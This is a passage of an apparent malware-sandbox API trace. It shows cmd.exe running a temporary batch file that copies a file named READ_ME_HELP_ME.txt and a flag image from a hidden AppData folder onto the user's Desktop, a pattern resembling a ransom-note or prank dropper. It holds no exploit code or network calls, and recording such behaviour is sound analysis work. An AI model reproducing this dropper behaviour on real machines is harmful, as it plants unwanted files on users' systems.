returned -13 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0037.128] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0037.128] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0037.128] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0037.128] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.128] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.128] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0037.128] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0037.128] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0037.128] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.txt" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\read_me_help_me.txt")) returned 0x20 [0037.128] VirtualAlloc (lpAddress=0x0, dwSize=0xfe00, flAllocationType=0x1000, flProtect=0x4) returned 0xcf0000 [0037.128] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.txt", fInfoLevelId=0x1, lpFindFileData=0xd174b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xd174b0) returned 0xd27150 [0037.128] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.txt", nBufferLength=0x104, lpBuffer=0xc8e080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.txt", lpFilePart=0x0) returned 0x30 [0037.128] _wcsicmp (_String1="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.txt", _String2="con") returned -53 [0037.128] CreateFileW (lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.txt" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\read_me_help_me.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e284, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x8c [0037.128] _open_osfhandle (_OSFileHandle=0x8c, _Flags=8) returned 3 [0037.128] _get_osfhandle (_FileHandle=3) returned 0x8c [0037.128] GetFileType (hFile=0x8c) returned 0x1 [0037.128] SetErrorMode (uMode=0x0) returned 0x0 [0037.128] SetErrorMode (uMode=0x1) returned 0x0 [0037.128] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.txt", nBufferLength=0x208, lpBuffer=0xc8e728, lpFilePart=0xc8e294 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.txt", lpFilePart=0xc8e294*="READ_ME_HELP_ME.txt") returned 0x43 [0037.128] SetErrorMode (uMode=0x0) returned 0x1 [0037.128] ReadFile (in: hFile=0x8c, lpBuffer=0xcf0000, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e2b8, lpOverlapped=0x0 | out: lpBuffer=0xcf0000*, lpNumberOfBytesRead=0xc8e2b8*=0x200, lpOverlapped=0x0) returned 1 [0037.128] SetErrorMode (uMode=0x0) returned 0x0 [0037.128] SetErrorMode (uMode=0x1) returned 0x0 [0037.128] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.txt", nBufferLength=0x208, lpBuffer=0xc8de80, lpFilePart=0xc8de64 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.txt", lpFilePart=0xc8de64*="READ_ME_HELP_ME.txt") returned 0x30 [0037.129] SetErrorMode (uMode=0x0) returned 0x1 [0037.129] _wcsicmp (_String1="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.txt", _String2="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.txt") returned -3 [0037.129] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.txt" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\read_me_help_me.txt")) returned 0xffffffff [0037.129] GetLastError () returned 0x2 [0037.129] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.txt", nBufferLength=0x104, lpBuffer=0xc8e080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.txt", lpFilePart=0x0) returned 0x30 [0037.129] SetErrorMode (uMode=0x0) returned 0x0 [0037.129] SetErrorMode (uMode=0x1) returned 0x0 [0037.129] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.txt", nBufferLength=0x208, lpBuffer=0xc8de80, lpFilePart=0xc8de64 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.txt", lpFilePart=0xc8de64*="READ_ME_HELP_ME.txt") returned 0x30 [0037.129] SetErrorMode (uMode=0x0) returned 0x1 [0037.129] _wcsicmp (_String1="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.txt", _String2="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.txt") returned -3 [0037.129] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.txt" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\read_me_help_me.txt")) returned 0xffffffff [0037.129] CopyFileExW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.txt" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\read_me_help_me.txt"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.txt" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\read_me_help_me.txt"), lpProgressRoutine=0x0, lpData=0x0, pbCancel=0x12b5164, dwCopyFlags=0x0) returned 1 [0037.131] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.txt" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\read_me_help_me.txt")) returned 0x20 [0037.131] SetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.txt", dwFileAttributes=0x20) returned 1 [0037.131] _close (_FileHandle=3) returned 0 [0037.131] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0037.131] GetFileType (hFile=0xffffffff) returned 0x0 [0037.131] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0037.131] SetFileTime (hFile=0xffffffff, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0xc8e310) returned 0 [0037.131] FindNextFileW (in: hFindFile=0xd27150, lpFindFileData=0xd174b0 | out: lpFindFileData=0xd174b0) returned 0 [0037.132] GetLastError () returned 0x12 [0037.132] FindClose (in: hFindFile=0xd27150 | out: hFindFile=0xd27150) returned 1 [0037.132] _vsnwprintf (in: _Buffer=0x12d0890, _BufferCount=0x103, _Format="%9d", _ArgList=0xc8ed44 | out: _Buffer=" 1") returned 9 [0037.132] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.132] GetFileType (hFile=0x28) returned 0x2 [0037.132] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0037.132] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xc8ecb8 | out: lpMode=0xc8ecb8) returned 1 [0037.132] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.132] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x28, lpConsoleScreenBufferInfo=0xc8ed08 | out: lpConsoleScreenBufferInfo=0xc8ed08) returned 1 [0037.132] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) copied.\r\n") returned 0x14 [0037.133] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0xc8ed38 | out: lpBuffer=" 1 file(s) copied.\r\n") returned 0x1b [0037.133] WriteConsoleW (in: hConsoleOutput=0x28, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x1b, lpNumberOfCharsWritten=0xc8ecec, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0xc8ecec*=0x1b) returned 1 [0037.133] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0xc8ed58, ProcessInformationLength=0x4) returned 0x0 [0037.133] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.133] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0037.134] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.134] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0037.134] _get_osfhandle (_FileHandle=0) returned 0x24 [0037.134] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0037.134] SetConsoleInputExeNameW () returned 0x1 [0037.134] GetConsoleOutputCP () returned 0x1b5 [0037.134] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0037.134] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.134] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0037.134] _open_osfhandle (_OSFileHandle=0x80, _Flags=8) returned 3 [0037.134] _get_osfhandle (_FileHandle=3) returned 0x80 [0037.134] SetFilePointer (in: hFile=0x80, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0037.134] VirtualFree (lpAddress=0xcf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0037.135] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0037.135] ReadFile (in: hFile=0x80, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x3c0, lpOverlapped=0x0) returned 1 [0037.135] SetFilePointer (in: hFile=0x80, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0037.135] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 96 [0037.135] GetFileType (hFile=0x80) returned 0x1 [0037.135] _get_osfhandle (_FileHandle=3) returned 0x80 [0037.135] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0037.135] GetEnvironmentVariableW (in: lpName="MYFILES", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F") returned 0x2f [0037.135] GetEnvironmentVariableW (in: lpName="username", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="5JgHKoaOfdp") returned 0xb [0037.136] _tell (_FileHandle=3) returned 1806 [0037.136] _close (_FileHandle=3) returned 0 [0037.136] _wcsicmp (_String1="copy", _String2="DIR") returned -1 [0037.136] _wcsicmp (_String1="copy", _String2="ERASE") returned -2 [0037.136] _wcsicmp (_String1="copy", _String2="DEL") returned -1 [0037.136] _wcsicmp (_String1="copy", _String2="TYPE") returned -17 [0037.136] _wcsicmp (_String1="copy", _String2="COPY") returned 0 [0037.136] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0037.136] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.136] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.136] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0037.136] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0037.136] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0037.136] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0037.136] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0037.136] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0037.136] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.136] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.136] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.136] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.137] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.138] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.138] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.138] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.138] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.138] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.138] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0037.138] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0037.138] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0037.138] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0037.138] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0037.138] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0037.138] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0037.138] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.138] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.138] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0037.138] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0037.138] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0037.138] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\Chinese_national_flag.png" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\chinese_national_flag.png")) returned 0x20 [0037.138] VirtualAlloc (lpAddress=0x0, dwSize=0xfe00, flAllocationType=0x1000, flProtect=0x4) returned 0xcf0000 [0037.138] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\Chinese_national_flag.png", fInfoLevelId=0x1, lpFindFileData=0xd174b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xd174b0) returned 0xd27170 [0037.138] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\Chinese_national_flag.png", nBufferLength=0x104, lpBuffer=0xc8e080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop\\Chinese_national_flag.png", lpFilePart=0x0) returned 0x36 [0037.138] _wcsicmp (_String1="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\Chinese_national_flag.png", _String2="con") returned -53 [0037.138] CreateFileW (lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\Chinese_national_flag.png" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\chinese_national_flag.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e284, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x8c [0037.138] _open_osfhandle (_OSFileHandle=0x8c, _Flags=8) returned 3 [0037.138] _get_osfhandle (_FileHandle=3) returned 0x8c [0037.138] GetFileType (hFile=0x8c) returned 0x1 [0037.138] SetErrorMode (uMode=0x0) returned 0x0 [0037.138] SetErrorMode (uMode=0x1) returned 0x0 [0037.138] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\Chinese_national_flag.png", nBufferLength=0x208, lpBuffer=0xc8e728, lpFilePart=0xc8e294 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\Chinese_national_flag.png", lpFilePart=0xc8e294*="Chinese_national_flag.png") returned 0x49 [0037.138] SetErrorMode (uMode=0x0) returned 0x1 [0037.138] ReadFile (in: hFile=0x8c, lpBuffer=0xcf0000, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e2b8, lpOverlapped=0x0 | out: lpBuffer=0xcf0000*, lpNumberOfBytesRead=0xc8e2b8*=0x200, lpOverlapped=0x0) returned 1 [0037.139] SetErrorMode (uMode=0x0) returned 0x0 [0037.139] SetErrorMode (uMode=0x1) returned 0x0 [0037.139] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\Chinese_national_flag.png", nBufferLength=0x208, lpBuffer=0xc8de80, lpFilePart=0xc8de64 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop\\Chinese_national_flag.png", lpFilePart=0xc8de64*="Chinese_national_flag.png") returned 0x36 [0037.139] SetErrorMode (uMode=0x0) returned 0x1 [0037.139] _wcsicmp (_String1="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\Chinese_national_flag.png", _String2="C:\\Users\\5JgHKoaOfdp\\Desktop\\Chinese_national_flag.png") returned -3 [0037.139] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\Chinese_national_flag.png" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\chinese_national_flag.png")) returned 0xffffffff [0037.139] GetLastError () returned 0x2 [0037.139] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\Chinese_national_flag.png", nBufferLength=0x104, lpBuffer=0xc8e080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop\\Chinese_national_flag.png", lpFilePart=0x0) returned 0x36 [0037.139] SetErrorMode (uMode=0x0) returned 0x0 [0037.139] SetErrorMode (uMode=0x1) returned 0x0 [0037.139] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\Chinese_national_flag.png", nBufferLength=0x208, lpBuffer=0xc8de80, lpFilePart=0xc8de64 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop\\Chinese_national_flag.png", lpFilePart=0xc8de64*="Chinese_national_flag.png") returned 0x36 [0037.139] SetErrorMode (uMode=0x0) returned 0x1 [0037.139] _wcsicmp (_String1="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\Chinese_national_flag.png", _String2="C:\\Users\\5JgHKoaOfdp\\Desktop\\Chinese_national_flag.png") returned -3 [0037.139] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\Chinese_national_flag.png" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\chinese_national_flag.png")) returned 0xffffffff [0037.139] CopyFileExW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\Chinese_national_flag.png" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\chinese_national_flag.png"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\Chinese_national_flag.png" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\chinese_national_flag.png"), lpProgressRoutine=0x0, lpData=0x0, pbCancel=0x12b5164, dwCopyFlags=0x0) returned 1 [0037.141] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\Chinese_national_flag.png" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\chinese_national_flag.png")) returned 0x20 [0037.141] SetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\Chinese_national_flag.png", dwFileAttributes=0x20) returned 1 [0037.141] _close (_FileHandle=3) returned 0 [0037.142] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0037.142] GetFileType (hFile=0xffffffff) returned 0x0 [0037.142] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0037.142] SetFileTime (hFile=0xffffffff, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0xc8e310) returned 0 [0037.142] FindNextFileW (in: hFindFile=0xd27170, lpFindFileData=0xd174b0 | out: lpFindFileData=0xd174b0) returned 0 [0037.142] GetLastError () returned 0x12 [0037.142] FindClose (in: 